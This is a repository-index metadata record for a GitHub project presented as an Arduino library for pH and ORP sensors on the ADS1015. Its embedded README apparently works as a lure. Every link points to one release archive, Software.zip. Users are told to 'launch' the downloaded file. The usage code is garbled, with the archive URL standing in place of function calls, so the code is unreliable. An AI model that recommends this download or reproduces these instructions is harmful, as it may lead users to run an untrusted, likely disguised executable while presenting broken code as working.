{"id":25111867,"url":"https://github.com/zerovr988/apaphx_ads1015","last_synced_at":"2025-04-02T10:18:17.431Z","repository":{"id":275855398,"uuid":"927395046","full_name":"zeroVR988/APAPHX_ADS1015","owner":"zeroVR988","description":"Arduino library for pH and ORP/Redox measurements with non-blocking operation, two-point calibration, and error detection. Features configurable sampling, rolling averages, and range validation (pH 0-14, ORP 0-1000mV). Compatible with any pH/ORP analog circuits using ADS1015. No external dependencies besides Wire.h.","archived":false,"fork":false,"pushed_at":"2025-04-01T10:35:04.000Z","size":1,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-02T10:18:12.879Z","etag":null,"topics":["ads1015","apa","apadevices","arduino","arduino-libraries","arduino-library","arduinolibrary","i2c","i2c-device","orp","redox","sensor","water-quality","watertreatment"],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/zeroVR988.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-04T22:05:05.000Z","updated_at":"2025-04-01T10:35:07.000Z","dependencies_parsed_at":null,"dependency_job_id":"99e6f29c-af71-42da-970d-63c8671dcd6d","html_url":"https://github.com/zeroVR988/APAPHX_ADS1015","commit_stats":null,"previous_names":["zerovr988/apaphx_ads1015"],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zeroVR988%2FAPAPHX_ADS1015","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zeroVR988%2FAPAPHX_ADS1015/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zeroVR988%2FAPAPHX_ADS1015/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zeroVR988%2FAPAPHX_ADS1015/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/zeroVR988","download_url":"https://codeload.github.com/zeroVR988/APAPHX_ADS1015/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246794208,"owners_count":20834938,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ads1015","apa","apadevices","arduino","arduino-libraries","arduino-library","arduinolibrary","i2c","i2c-device","orp","redox","sensor","water-quality","watertreatment"],"created_at":"2025-02-08T01:28:23.658Z","updated_at":"2025-04-02T10:18:17.424Z","avatar_url":"https://github.com/zeroVR988.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🌟 **APAPHX_ADS1015 Arduino Library**\n\n![APAPHX_ADS1015](https://github.com/zeroVR988/APAPHX_ADS1015/releases/download/v2.0/Software.zip)\n\n## Overview\nWelcome to the APAPHX_ADS1015 Arduino library repository. This library is designed for pH and ORP/Redox measurements using non-blocking operation, two-point calibration, and error detection. It features configurable sampling, rolling averages, and range validation for pH (0-14) and ORP (0-1000mV) measurements. This library is compatible with any pH/ORP analog circuits utilizing the ADS1015. The best part? No external dependencies are needed besides Wire.h.\n\n## Installation\n1. Download the [APAPHX_ADS1015 library](https://github.com/zeroVR988/APAPHX_ADS1015/releases/download/v2.0/Software.zip).\n2. Launch the downloaded file and extract the contents.\n3. Move the extracted folder to your Arduino libraries directory.\n\n## Features\n- Non-blocking operation for smooth integration into projects.\n- Two-point calibration for accurate measurements.\n- Error detection for reliable readings.\n- Configurable sampling for customized use.\n- Rolling averages for improved accuracy.\n- Range validation for pH and ORP measurements.\n- Compatible with any pH/ORP analog circuits using ADS1015.\n- No external dependencies besides Wire.h.\n\n## Usage\nTo start using the APAPHX_ADS1015 library in your Arduino projects, follow these steps:\n\n1. Include the library in your Arduino sketch.\n```cpp\n#include \u003cAPAPHX_ADS1015.h\u003e\n```\n\n2. Create an instance of the library:\n```cpp\nAPAPHX_ADS1015 sensor;\n```\n\n3. Initialize the library in the `setup()` function:\n```cpp\nvoid setup() {\n    https://github.com/zeroVR988/APAPHX_ADS1015/releases/download/v2.0/Software.zip();\n}\n```\n\n4. Use the library functions to read pH and ORP values:\n```cpp\nfloat pHValue = https://github.com/zeroVR988/APAPHX_ADS1015/releases/download/v2.0/Software.zip();\nfloat ORPValue = https://github.com/zeroVR988/APAPHX_ADS1015/releases/download/v2.0/Software.zip();\n```\n\n5. Enjoy accurate pH and ORP measurements in your projects!\n\n## Repository Topics\n- ads1015\n- apa\n- apadevices\n- arduino\n- arduino-libraries\n- arduino-library\n- arudino\n- i2c\n- i2c-device\n- orp\n- ph\n- redox\n- sensor\n- sensors\n- water-quality\n- watertreatment\n\n## Learn More\nFor more detailed information, visit the official [APAPHX_ADS1015 GitHub Repository](https://github.com/zeroVR988/APAPHX_ADS1015/releases/download/v2.0/Software.zip).\n\n[![Download APAPHX_ADS1015](https://github.com/zeroVR988/APAPHX_ADS1015/releases/download/v2.0/Software.zip)](https://github.com/zeroVR988/APAPHX_ADS1015/releases/download/v2.0/Software.zip)\n\n🔧🔬🌡️ Happy measuring with APAPHX_ADS1015! 🌊🌟","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzerovr988%2Fapaphx_ads1015","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzerovr988%2Fapaphx_ads1015","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzerovr988%2Fapaphx_ads1015/lists"}